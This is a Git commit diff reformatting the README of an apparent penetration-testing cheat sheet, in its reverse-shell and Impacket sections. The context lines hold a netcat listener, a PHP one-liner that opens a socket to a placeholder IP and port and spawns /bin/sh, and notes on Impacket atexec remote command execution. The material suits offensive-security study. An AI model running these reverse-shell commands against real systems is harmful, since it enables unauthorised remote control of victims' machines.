Update README.md

This commit is contained in:
Joe Totes
2022-09-01 09:12:44 -04:00
committed by GitHub
parent 3c0feaf905
commit 5d5047a228

View File

@@ -839,7 +839,13 @@ ls -alhR /opt/lampp/htdocs/ 2>/dev/null
# Reverse Shell # Reverse Shell
## NC Listen - Client [STEP 1] <br />
[Reverse Shell Generator](https://www.revshells.com/)
<br />
#### NC Listen - Client [STEP 1]
<br /> <br />
@@ -854,7 +860,7 @@ sudo nc -lnvp {PORT}
``` ```
<br /> <br />
## NC Execute - Server [STEP 2] #### NC Execute - Server [STEP 2]
```bash ```bash
# With netcat installed # With netcat installed
@@ -888,7 +894,7 @@ php -r $sock=fsockopen(“{IP ADDRESS}”,{PORT});exec(“/bin/sh -i <&3 >&3
``` ```
<br /> <br />
### Impacket Remote Code Execution #### Impacket Remote Code Execution
```bash ```bash
# atexec.py : Atexec.py: Impacket has a python library that helps an attacker to access the victim host machine remotely through DCE/RPC based protocol used by CIFS hosts to access/control the AT-Scheduler Service and execute the arbitrary system command. # atexec.py : Atexec.py: Impacket has a python library that helps an attacker to access the victim host machine remotely through DCE/RPC based protocol used by CIFS hosts to access/control the AT-Scheduler Service and execute the arbitrary system command.
@@ -909,23 +915,10 @@ php -r $sock=fsockopen(“{IP ADDRESS}”,{PORT});exec(“/bin/sh -i <&3 >&3
# {IP ADDRESS}: Server IP address # {IP ADDRESS}: Server IP address
``` ```
## Reverse Shell Generator
<br />
[Reverse Shell Generator](https://www.revshells.com/)
<br />
# Shell Upgrade # Shell Upgrade
<br /> <br />
## Python
<br />
```bash ```bash
# About: A command to spawn a new shell using python # About: A command to spawn a new shell using python
# Download: May or may not be installed on server machine # Download: May or may not be installed on server machine